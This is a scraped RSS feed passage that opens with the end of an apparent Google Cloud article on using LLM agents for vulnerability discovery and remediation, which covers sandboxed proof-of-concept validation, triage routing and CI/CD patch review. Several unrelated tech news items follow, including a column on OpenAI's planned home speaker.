<p><span>A component of this alignment is the implementation of strong authentication principles. Organizations should eliminate implicit trust by enforcing continuous, context-aware authentication and authorization. Utilizing Zero Trust Network Access (ZTNA) solutions, such as Identity-Aware Proxies (IAP), shields critical management interfaces (e.g., SSH, RDP) and internal systems from direct internet exposure, granting access only to verified identities and compliant devices.</span></p>
<p><span>For public-facing applications and APIs, attack surface reduction involves deploying Layer 7 inspection at the load balancer or API gateway level. This hardening layer enforces strict schema validation, intercepting and neutralizing malformed inbound traffic and potential exploits before they can interact with internal application logic.</span></p>
<p><span>Securing the software supply chain is equally vital in modern blueprints, and organizations should align with frameworks like </span><a href="https://slsa.dev/spec/v0.1/levels" rel="noopener" target="_blank"><span>Supply-chain Levels for Software Artifacts (SLSA)</span></a><span> across both dependency and build tracks. Security policies should mandate that third-party dependencies are routed through a centralized artifact repository equipped with automated curation services, such as </span><a href="https://cloud.google.com/security/products/assured-open-source-software"><span>Google Assured Open Source Software (OSS)</span></a><span> or an equivalent solution, preventing untrusted code from entering the development lifecycle. Furthermore, maturing toward advanced SLSA build levels (e.g., SLSA level 3) through the implementation of isolation, ephemerality and reproducibility requirements via  ephemeral compute infrastructure for CI/CD runners reduces the likelihood of attacker persistence by ensuring environments are short-lived and automatically cycled.</span></p>
<p><span>To complement these pre-build controls, runtime observability should be established across all production workloads. This requires monitoring both infrastructure-level behavior and the specific runtime libraries actively executing in production, which surfaces true exploitable risk far beyond a static Software Bill of Materials. In tandem with monitoring workloads, organizations should secure how they authenticate by implementing workload identity federation. By removing static credentials and instead using short-lived tokens backed by strong cryptographic identity verification, organizations can reduce the risk of credential theft and unauthorized lateral movement.</span></p>
<p><span>Within the internal environment, microsegmentation should be enforced to break down flat networks into granular security zones. Routing application traffic through a Secure Access Service Edge (SASE) architecture integrates network routing directly with robust identity controls, rendering internal services completely invisible to unauthenticated users and containing threats to their initial point of entry.</span></p>
<p><span>Finally, automated containment and incident response within a zero trust framework must rely on deterministic, auditable tooling. Endpoint detection and response (EDR) platforms and SOAR playbooks should handle high-fidelity containment tasks through hardcoded execution logic. While AI tools accelerate triage and policy recommendation, actual execution capabilities must remain restricted to well-defined, pre-tested workflows to maintain total architectural predictability.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image8.max-1000x1000.png" alt="Demystifying AI image8">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 3: Structural containment and observability architecture</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Track 2: Product Security &amp; Development (1P Code)</span></h3>
<h4><span>Deterministic and probabilistic tooling</span></h4>
<p><span>Integrating LLM agents into vulnerability management and security workflows requires recognizing the differences between deterministic and probabilistic tooling. Traditional SAST and DAST tools utilize fixed methodologies to evaluate vulnerabilities through structural code parsing or definitive runtime observations. LLMs, however, evaluate source code by processing tokens simultaneously to calculate statistical and semantic relationships, rather than tracing deterministic execution tracks.</span></p>
<p><span>While techniques like Chain of Thought (CoT) prompting allow models to bridge this gap by decomposing complex code paths into intermediate reasoning steps, this process remains bounded by architectural limitations. Even when a model possesses a context window large enough to ingest entire repositories, it may experience attention degradation across long inputs, often failing to correctly weight intervening validation or sanitization logic within the prompt. For example, if a variable is tainted on line 10 but sanitized on line 500, attention degradation can cause the model to lose track of the sanitization logic. Furthermore, when enterprise codebases require chunking to fit within context limits, the resulting fragmentation may cause the model to lose track of end-to-end data flows.</span></p>
<p><span>Consequently, probabilistic engines are effective at uncovering localized, static anomalies, such as hardcoded credentials or outdated dependencies, but frequently misjudge complex vulnerabilities split across fragmented chunks or extended context windows. Notable exceptions occur when these probabilistic models are coupled with deterministic feedback loops. For instance, when analyzing C++ memory corruption, an LLM can be equipped with a test harness to iteratively execute code and definitively prove a crash. While these dynamic validation applications are detailed in subsequent sections, the baseline limitation for static analysis across standard enterprise codebases remains: models struggle to consistently evaluate dispersed logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image4.max-1000x1000.png" alt="Demystifying AI image4">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="ak3zc">Figure 4: Deterministic SAST scanners vs. probabilistic LLMs</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Binary and architectural oracles</span></h3>
<p><span>Many security programs are moving toward agent workflows where an agent autonomously spins up a test environment and uses tools to execute payloads and verify its findings. This is a promising approach, but it is important to understand where it is most effective.</span></p>
<p><span>Agent workflows perform well against bug classes with binary and observable oracles, meaning the system provides an objective, 'crash or no crash' feedback loop. For example, if a model is hunting for memory corruption in a C++ kernel, a successful exploit is undeniable: the payload executes, and a resulting crash definitively proves the vulnerability. This explains why the industry is currently seeing a surge in AI-discovered vulnerabilities across memory-unsafe targets like web browsers and operating systems.</span></p>
<p><span>However, enterprise software is heavily dominated by vulnerabilities that require architectural oracles for validation. Vulnerabilities like authorization bypasses, complex business logic flaws, and indirect server-side request forgeries require an understanding of business context and cross-service trust boundaries. If an agent's payload fails to produce a clear outcome, it can't reliably distinguish whether the vulnerability is a hallucination or if it simply constructed the payload incorrectly. An agent's malformed payload might even crash an unrelated background process and cause the model to hallucinate a success and report a false confirmation. Complex enterprise architecture contains unwritten business intent that a probabilistic engine can't inherently know.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image3.max-1000x1000.png" alt="Demystifying AI image3">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 5: Evaluating vulnerabilities against binary vs. architectural oracles</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Targeted deployment and human impact</span></h3>
<p><span>Organizations adopting LLMs for vulnerability discovery face a massive staffing challenge. LLMs can generate findings significantly faster than human engineers can triage them. If every LLM-generated alert requires manual review, security teams will quickly face burnout and/or suffer alarm fatigue.</span></p>
<p><span>Rather than indiscriminately pointing agents at all available codebases and risking an influx of unverified output, security teams need a selective deployment strategy. Mature programs should maintain SAST and DAST for baseline hygiene and deterministic rule enforcement, and reserve intensive agent audits for high-impact components with clear binary oracles.</span></p>
<p><span>Organizations can prioritize agent audits on systems where the technology's strengths align with the broader risk profile:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Memory-unsafe codebases:</strong><span> Legacy or high-performance components written in memory-unsafe languages such as C, C++, or Assembly are strong candidates for LLM audits. These languages are susceptible to memory corruption flaws, such as buffer overflows and use-after-free conditions. Because these vulnerabilities trigger definitive failure states like segmentation faults, they work well with automated sandboxes where agents can compile the code with memory sanitizers and write proof-of-concept inputs. This approach is also effective for auditing the native extensions where safe languages call unsafe internal libraries, such as Python C extensions or the Java Native Interface (JNI).</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Systems highly exposed to outside content:</strong><span> First-party data ingestion pipelines, custom API gateways, or proprietary edge proxies. A prerequisite here is direct access to the source code, this strategy is strictly for internally developed or fully open-source codebases where the organization can inspect the logic. Because these systems directly parse untrusted internet traffic, targeting their source code for LLM-driven audits yields the highest risk-reduction ROI.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Shared internal libraries and utilities: </strong><span>Core serialization/deserialization packages, common utility functions, and custom middleware wrappers (such as internal message-queue parsers) maintained in-house. Because the enterprise owns the source code for these shared building blocks, agent tools can easily hook into them within automated test harnesses to fuzz inputs and catch low-level logic or parsing bugs with high fidelity.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Foundational security boundaries:</strong><span> Internally developed centralized authentication services, custom OAuth providers, and internal credential brokers. While testing complex identity boundaries generates higher logic-based noise, having full access to the source code allows teams to pair agents with deterministic checks to safely triage findings, given that the blast radius of an authentication failure justifies the human effort.</span></p>
</li>
</ul>
<p><span>To filter the noise generated by LLMs, organizations should establish routing rules. Require the agent to generate a fully reproducible, deterministic test harness (such as a compiled binary or a Python test script) that attempts to prove the exploit. This harness must execute automatically in an isolated, monitored sandbox. If the sandbox execution fails (due to a syntax error or a failed exploit), the ticket is discarded, sparing human resources. However, organizations should enforce execution timeouts and iteration limits on these test harnesses. Without hard limits, an autonomous agent attempting to prove a vulnerability can fall into an infinite loop: writing a script, failing, rewriting, and failing again, exhausting API token budgets and compute resources against a single dead-end vulnerability, creating significant cost overruns without advancing the security review. To manage these expenses, organizations should incorporate FinOps principles to balance the compute and API costs of LLM audits against the traditional expenses of manual triage.</span></p>
<p><span>However, a successful execution in the sandbox does not guarantee an actionable, high-priority risk. In practice, autonomous agents frequently produce working PoCs for genuine technical flaws that are ultimately irrelevant; or warrant a lower remediation priority within the context of the system's threat model. For example, the agent might successfully exploit an unreachable dead-code path, or trigger a bug that requires administrative access to execute and yields no further escalation of privilege. Therefore, a human engineer should be assigned to review and prioritize the ticket only if the sandbox registers a successful execution, validating environmental context, reachability, and true business impact as part of the review.</span></p>
<p><span>This workflow reduces the volume of alerts, but it is important to understand that the security team's workload does not disappear. The engineer's primary job shifts from manually hunting for the initial vulnerability to auditing the LLM-generated proof to ensure it represents a meaningful risk rather than an unexploitable or contextually irrelevant finding. Leadership should properly staff and train teams for this new reality. Deploying LLM agents does not remove the need for skilled practitioners; it redirects their workload toward complex validation. Equally important is training teams to recognize the risk of false negatives. A hyper-focus on filtering AI-generated noise can create a false sense of security. If an exploit relies on a novel technique or a zero-day vulnerability that was not heavily weighted in the model's training data, the agent will likely scan right past it in silence. LLMs augment discovery, but they do not guarantee exhaustive coverage.</span></p>
<p><span>When integrating LLMs into SAST triage pipelines, human engineers should also verify the broader architectural integrity. Prompting an LLM with specific SAST warnings can induce contextual narrowing, where the agent becomes hyper-fixated on resolving a localized syntax error and misses broader architectural flaws existing in the same file. Furthermore, if the agent's mandate extends beyond discovery to automated remediation (such as writing and proposing code fixes), this human-in-the-loop validation becomes critical to ensure the LLM does not inadvertently introduce new regressions or bypass intended business logic.</span></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_20.max-1000x1000.png" alt="Demistiying Image 6 New">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 6: Flowchart outlining the targeted LLM deployment and triage workflow.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Remediation and hardening</span></h3>
<h4><span>LLM-assisted code remediation</span></h4>
<p><span>A primary goal of integrating large language models (LLMs) into the software development lifecycle is automated remediation. To achieve this, organizations are deploying these capabilities through two primary execution methods: directly within the integrated development environment (IDE) or as a centralized pipeline runner. Examples include </span><a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"><span>CodeMender</span></a><span>, although as of time of writing, it is not publicly available.</span></p>
<h4><strong>IDE-integrated method</strong><span> </span></h4>
<p><span>This method shifts remediation as far left as possible by operating as an active pair-programmer. Tools running continuous static analysis in the background of the IDE surface vulnerabilities directly to the developer via editor diagnostics like inline indicators or hover tooltips.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Localized scope:</strong><span> The developer can trigger the LLM agent to analyze the localized data flow and generate a targeted patch (such as implementing parameterized SQL queries). By constraining the LLM to localized, syntax-level fixes, the scope of the change remains contained. This prevents the agent from attempting sprawling, multi-file refactors that frequently break complex architectural logic.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Human-in-the-loop:</strong><span> The developer reviews the AI-generated patch before the code is committed.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Managing false positives:</strong><span> Local IDE agents allow developers to manage false positives dynamically. Suppressing alerts anchored to specific line text reduces alert fatigue and preserves developer trust.</span></p>
</li>
</ul>
<h4><strong>CI/CD runner method</strong><span> </span></h4>
<p><span>The runner method executes asynchronously within the CI/CD pipeline to use an LLM to review committed code and automatically propose remediation.</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Restricted execution and deterministic validation: </strong><span>Asking a centralized runner to automatically rewrite a complex, multi-file authorization flaw directly in the main branch introduces a high risk of breaking logic errors. To mitigate this, agents must be restricted to generating pull requests (PRs). Once a PR is generated, it must automatically execute standard regression suites alongside the deterministic test harness. By rerunning the initial PoC against the patched code, the workflow repurposes the exploit script as a validation oracle to prove the vulnerability has been remediated. A human engineer then reviews the PR to validate the architectural logic before merging.</span></p>
</li>
</ul>
<p><span>In all cases security teams should define a clear boundary between the two methods rather than rely on a single approach. IDE agents provide immediate, syntax-level support. They catch and resolve low-complexity errors locally before developers commit code. Centralized CI/CD runners handle broader organizational baselines. They propose complex, repository-wide fixes for vulnerabilities that bypass local environments.</span></p>
<h4><strong>Post-deployment controls</strong><span> </span></h4>
<p><span>Even with human review and deterministic test harnesses, AI-generated patches can still introduce logic regressions in production. Organizations should implement strict post-deployment controls:</span></p>
<ul>
<li aria-level="1">
<p role="presentation"><strong>Automated rollbacks:</strong><span> Treating LLM-generated code with the same post-deployment scrutiny as any major architectural change ensures that if an unforeseen regression traverses the CI/CD pipeline, the environment can revert to a known good state.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Mitigating model drift:</strong><span> Relying on managed AI services introduces the ongoing risk of model drift. To prevent silent weight updates from breaking test harnesses, organizations need to pin specific model API versions to frozen releases. When a pinned version reaches its end-of-life, organizations will face a forced migration. Mitigating this pipeline fragility requires combining model pinning with deterministic regression suites.</span></p>
</li>
<li aria-level="1">
<p role="presentation"><strong>Compliance and auditability:</strong><span> If an AI agent automatically closes a security ticket or generates a patch in the CI/CD pipeline, organizations should maintain immutable audit logs to satisfy frameworks like SOC 2 ,PCI-DSS, FedRAMP, and CMMC. National security deployments must also account for data sovereignty requirements. This logging should record the specific model version that proposed the fix, the deterministic test results that validated it, and the human engineer who approved the merge. Furthermore, because emerging legislation like the EU AI Act emphasizes human oversight for high-risk applications, security teams should carefully evaluate how autonomous remediation workflows align with these evolving global regulatory standards.</span></p>
</li>
</ul></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Screenshot_2026-07-15_at_10.24.22PM.max-1000x1000.png" alt="demistifying image 7">
        
        
      
        <figcaption class="article-image__caption "><p data-block-key="bg92b">Figure 7: Flowchart demonstrating the difference between local IDE AI remediation and centralized CI/CD pipeline remediation.</p></figcaption>
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph_advanced"><h3><span>Conclusion</span></h3>
<p><span>Leveraging LLMs in vulnerability management is a multi-layer solution: Integrating it requires separating workflows by layer. At the enterprise infrastructure level, Risk-Based Vulnerability Management (RBVM) and exposure management are necessary to process the volume of findings and configuration drift. At the product and code security level, LLM-enabled vulnerability assessment and remediation must operate alongside foundational deterministic controls, such as SAST and DAST, to audit custom, open-source, or third-party code.</span></p>
<p><span>Although LLMs can help manage technical debt and accelerate vulnerability discovery, they do not replace secure-by-design principles. The fact that LLM agents are proving exceptionally capable at identifying and exploiting localized memory corruption in memory-unsafe codebases, alongside other primary vectors, should serve as a wake-up call. </span></p>
<p><span>As a long-term strategy aligned with </span><a href="https://media.defense.gov/2022/Nov/10/2003112742/-1/-1/0/CSI_SOFTWARE_MEMORY_SAFETY.PDF" rel="noopener" target="_blank"><span>NSA guidance on Software Memory Safety</span></a><span>, organizations need to phase memory-safe languages into new internal development. LLMs are beginning to expand what is possible here by reducing the manual labor required for code migration. Converting existing C or C++ codebases to Rust has historically been unrealistic due to the large volume of engineering hours needed. While fully automated translation is not a turn-key solution, using LLMs to assist engineers with the bulk of the conversion can make these long-term migrations operationally viable. Beyond internal efforts, organizations should use procurement requirements to incentivize vendors to reduce their reliance on memory-unsafe languages and establish secure configuration defaults over time. Bridging the gap between AI velocity and enterprise defense means building an automated pipeline to manage the current backlog, while architecting systems where entire classes of vulnerabilities and misconfigurations are eliminated by design.</span></p>
<h3><span>Acknowledgements</span></h3>
<p><span>This analysis would not have been possible without the assistance of Google Threat Intelligence Group (GTIG) and other broader Google teams.</span></p></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Linux Patches Finally Allow Apple Magic Keyboard/Mouse Battery Monitoring Via Bluetooth]]></title>
<description><![CDATA[submitted by    /u/anh0516   [link]   [comments]]]></description>
<link>https://tsecurity.de/de/3672226/linux-tipps/linux-patches-finally-allow-apple-magic-keyboardmouse-battery-monitoring-via-bluetooth/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3672226/linux-tipps/linux-patches-finally-allow-apple-magic-keyboardmouse-battery-monitoring-via-bluetooth/</guid>
<pubDate>Thu, 16 Jul 2026 04:37:31 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[  submitted by   <a href="https://www.reddit.com/user/anh0516"> /u/anh0516 </a> <br> <span><a href="https://www.phoronix.com/news/Apple-Magic-Bluetooth-Battery">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uxehsb/linux_patches_finally_allow_apple_magic/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[How You Distill 80 Years of Marvel Comics Into Magic: The Gathering Cards]]></title>
<description><![CDATA[Magic: The Gathering's new set, Marvel Super Heroes, has around 600 cards. Here's how they chose which heroes made the cut.]]></description>
<link>https://tsecurity.de/de/3671998/it-nachrichten/how-you-distill-80-years-of-marvel-comics-into-magic-the-gathering-cards/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671998/it-nachrichten/how-you-distill-80-years-of-marvel-comics-into-magic-the-gathering-cards/</guid>
<pubDate>Thu, 16 Jul 2026 00:02:22 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Magic: The Gathering's new set, Marvel Super Heroes, has around 600 cards. Here's how they chose which heroes made the cut.]]></content:encoded>
</item>
<item>
<title><![CDATA[Towards demystifying the creativity of diffusion models]]></title>
<description><![CDATA[Algorithms & Theory]]></description>
<link>https://tsecurity.de/de/3671601/ai-nachrichten/towards-demystifying-the-creativity-of-diffusion-models/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671601/ai-nachrichten/towards-demystifying-the-creativity-of-diffusion-models/</guid>
<pubDate>Wed, 15 Jul 2026 20:18:44 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Algorithms &amp; Theory]]></content:encoded>
</item>
<item>
<title><![CDATA[Netflix tries to recapture Stranger Things magic with nostalgic re-release]]></title>
<description><![CDATA[Netflix just can't let Stranger Things go. Since the final episode aired on New Year's Eve there's been a behind-the-scenes documentary, an animated series that expands the story, and now, on the 10th anniversary of the show's original release, Netflix has released a new version of the show's fir...]]></description>
<link>https://tsecurity.de/de/3671419/it-nachrichten/netflix-tries-to-recapture-stranger-things-magic-with-nostalgic-re-release/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671419/it-nachrichten/netflix-tries-to-recapture-stranger-things-magic-with-nostalgic-re-release/</guid>
<pubDate>Wed, 15 Jul 2026 18:47:48 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Netflix just can't let Stranger Things go. Since the final episode aired on New Year's Eve there's been a behind-the-scenes documentary, an animated series that expands the story, and now, on the 10th anniversary of the show's original release, Netflix has released a new version of the show's first season. The episodes have all been […]]]></content:encoded>
</item>
<item>
<title><![CDATA[What problems would an AI speaker from OpenAI actually solve?]]></title>
<description><![CDATA[OpenAI’s first device will be a screenless home AI system that can play music, control appliances, and respond to messages and questions, according to Bloomberg. I can’t help but ask what makes this device different from Apple’s HomePod with SiriAI?



The OpenAI product is intended to be the fir...]]></description>
<link>https://tsecurity.de/de/3671257/it-nachrichten/what-problems-would-an-ai-speaker-from-openai-actually-solve/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3671257/it-nachrichten/what-problems-would-an-ai-speaker-from-openai-actually-solve/</guid>
<pubDate>Wed, 15 Jul 2026 18:03:54 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">OpenAI’s first device will be a screenless home AI system that can play music, control appliances, and respond to messages and questions, <a href="https://finance.yahoo.com/news/openais-first-device-will-be-movable-screenless-speaker-built-as-ai-companion-205215714.html" target="_blank" rel="noreferrer noopener">according to Bloomberg</a>. I can’t help but ask what makes this device different from Apple’s HomePod with SiriAI?</p>



<p class="wp-block-paragraph">The OpenAI product is intended to be the first of a family of solutions and is expected to use the recently-introduced GPT-Live large language model (LLM). The latter is an advanced model capable of processing information swiftly and of providing natural responses to conversations. </p>



<h2 class="wp-block-heading"><strong>A potential gold mine for hackers</strong></h2>



<p class="wp-block-paragraph">This expertise might help it deliver more accurate responses to requests, though the information could also become a gold mine for data brokers, hackers, and advertisers if there turns out to be any way they can get their hands on it. It’s not yet known how — or even if — OpenAI proposes protecting user privacy within its systems. </p>



<p class="wp-block-paragraph">The device, which is still under development, is explained as being a home companion that also includes a built-in camera and sensors so it can gather contextual information about where you are, becoming an expert on you and your needs. It also features autonomous mechanical elements that physically shift on their own, intended to give the product a “personality,” rather than being a boring black box.</p>



<h2 class="wp-block-heading"><strong>Can we live without this?</strong></h2>



<p class="wp-block-paragraph">While OpenAI’s development is not yet complete and things could change before it reaches market, based on Bloomberg’s report I’m not terribly clear how unique it is going to be. After all, as LLM support is introduced in existing smart speaker systems from Apple, or even Amazon, what unique features does this device bring that consumers can’t live without? More particularly, what problems does it solve and why does it exist?</p>



<h2 class="wp-block-heading"><strong>Manufacturing economics</strong></h2>



<p class="wp-block-paragraph">What’s also unclear is how far along OpenAI is on the road to mass manufacturing the device. Apple’s <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">recent lawsuit against OpenAI</a> confirmed the challenger is speaking with Apple’s own manufacturing partners as well as <a href="https://www.applemust.com/apple-reels-as-openai-recruits-hardware-staff-and-manufacturing-partners/" target="_blank" rel="noreferrer noopener">hiring hundreds of Apple engineers</a>. Despite the talent war, I consider it unlikely OpenAI will be able to lock in the kinds of manufacturing deals it needs to <a href="https://www.applemust.com/openai-discovers-it-takes-time-not-just-design-to-build-great-hardware/" target="_blank" rel="noreferrer noopener">bring the product to market at an acceptable price</a>. </p>



<p class="wp-block-paragraph">That suggests either that its inaugural “home companion” will seem incredibly expensive (as so many of the products Jony Ive has designed since leaving Apple seem to be), or that OpenAI will sell these things at a subsidy. </p>



<p class="wp-block-paragraph">Bloomberg suggests the systems will cost $200 to $300. That seems low given the current component market, expected design quality and the technology used if the plan is to make something good. And it leaves me wondering how deeply investors will underwrite hardware sales, given the <a href="https://www.computerworld.com/article/4187825/the-trillion-dollar-ai-hallucination.html">eye-watering losses the company is already making</a>. </p>



<h2 class="wp-block-heading"><strong>Apple’s trade secrets case</strong></h2>



<p class="wp-block-paragraph">Given ongoing speculation that Apple <a href="https://www.ynetnews.com/tech-and-digital/article/rjtr6344gg" target="_blank" rel="noreferrer noopener">plans something similar</a> in the form of a hybrid HomePod/iPad <a href="https://www.computerworld.com/article/3611226/apple-plans-for-a-smarter-llm-based-siri-smart-assistant.html" target="_blank">equipped with AI</a> and limited mobility, the <a href="https://www.computerworld.com/article/4195828/rotten-to-its-core-apple-files-an-explosive-lawsuit-against-openai.html">recent lawsuit</a> strongly suggests Apple feels some of OpenAI’s plans cross the line into using proprietary technologies and ideas Cupertino has spent years pursuing. Apple’s lawsuit seems to bring much more meaningful evidence than just an argument concerning product design. </p>



<h2 class="wp-block-heading"><strong>Betting the farm on Ive</strong></h2>



<p class="wp-block-paragraph">We also don’t know the extent to which consumers will be open to semi-sentient AI devices lurking in their lives. While Apple can lean into its loyal customer base and broaden its offering with rock-solid promises concerning user privacy, OpenAI has less to bring to the launch party.</p>



<p class="wp-block-paragraph">That means it is attempting to pivot millions who use its services into investing in its hardware. It presumably hopes that it will be able to drive that transition by using the design involvement of <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">acclaimed Apple designer Jony Ive</a> as a form of magic talisman. </p>



<p class="wp-block-paragraph">The challenge is that while Ive is a big name in Apple history, Apple users are extremely loyal and may react against the involvement of their favorite designer. It’s like finding out someone you thought was on your team actually supported someone else. </p>



<p class="wp-block-paragraph">It will be different outside Apple, where less loyal cohorts might see the product introduction as a chance to put a design from Ive through its paces without signing up to a Mac, iPhone, iPad, or HomePod. </p>



<p class="wp-block-paragraph">For the rest of us, the question will be whether OpenAI’s <a href="https://www.applemust.com/jony-ive-says-openais-first-mysterious-consumer-gadget-will-ship-within-two-years/" target="_blank" rel="noreferrer noopener">Ive-designed product</a> channels the successful design ethic of the iMac, or that of the far less successful hockey puck mouse. Like (timely World Cup klaxon) France against Spain, OpenAI’s investors have to hope the best version of Ive’s design principles show up, because their risked fortunes potentially depend on it. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Honor 600 Pro im Test: Besser als Honors Magic-Smartphones?]]></title>
<description><![CDATA[Das Honor 600 Pro soll mehr sein als eine gehobene Mittelklasse-Alternative. Das neue Smartphone setzt auf viel Leistung, Ausdauer, starke Kameratechnik und KI im Alltag. Reicht das, um die noch teureren Flaggschiffe zu ärgern?]]></description>
<link>https://tsecurity.de/de/3670822/it-nachrichten/honor-600-pro-im-test-besser-als-honors-magic-smartphones/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670822/it-nachrichten/honor-600-pro-im-test-besser-als-honors-magic-smartphones/</guid>
<pubDate>Wed, 15 Jul 2026 15:33:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das Honor 600 Pro soll mehr sein als eine gehobene Mittelklasse-Alternative. Das neue Smartphone setzt auf viel Leistung, Ausdauer, starke Kameratechnik und KI im Alltag. Reicht das, um die noch teureren Flaggschiffe zu ärgern?]]></content:encoded>
</item>
<item>
<title><![CDATA[Star Trek goes Magic: The Gathering: Dieses Set bricht auf in unendliche Weiten]]></title>
<description><![CDATA[Zwei Giganten treffen aufeinander: die legendäre Science-Fiction-Marke Star Trek und das seit Anfang der 1990er-Jahre erfolgreiche Trading-Card-Game Magic: The Gathering. Wizards of the Coast hat in dieser Woche endlich mehr zum kommenden Karten-Set verraten, das im November 2026 erscheinen wird....]]></description>
<link>https://tsecurity.de/de/3670519/it-nachrichten/star-trek-goes-magic-the-gathering-dieses-set-bricht-auf-in-unendliche-weiten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3670519/it-nachrichten/star-trek-goes-magic-the-gathering-dieses-set-bricht-auf-in-unendliche-weiten/</guid>
<pubDate>Wed, 15 Jul 2026 13:48:01 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Zwei Giganten treffen aufeinander: die legendäre Science-Fiction-Marke Star Trek und das seit Anfang der 1990er-Jahre erfolgreiche Trading-Card-Game Magic: The Gathering. Wizards of the Coast hat in dieser Woche endlich mehr zum kommenden Karten-Set verraten, das im November 2026 erscheinen wird....<p>Zum Beitrag: <a href="https://stadt-bremerhaven.de/star-trek-goes-magic-the-gathering-dieses-set-bricht-auf-in-unendliche-weiten/">Star Trek goes Magic: The Gathering: Dieses Set bricht auf in unendliche Weiten</a>
</p><p>
Wo du uns folgen kannst:
<a href="http://www.facebook.com/CaschysBlog">Facebook</a>, <a href="https://www.reddit.com/r/CaschysBlog/">Reddit</a>, <a href="https://news.google.com/publications/CAAqMQgKIitDQklTR2dnTWFoWUtGSE4wWVdSMExXSnlaVzFsY21oaGRtVnVMbVJsS0FBUAE?ceid=DE:de&amp;oc=3">Google News</a>, <a href="https://x.com/CaschysBlog">X</a>, <a href="https://www.threads.com/@caschysblog">Threads</a>
<br>
</p><div>
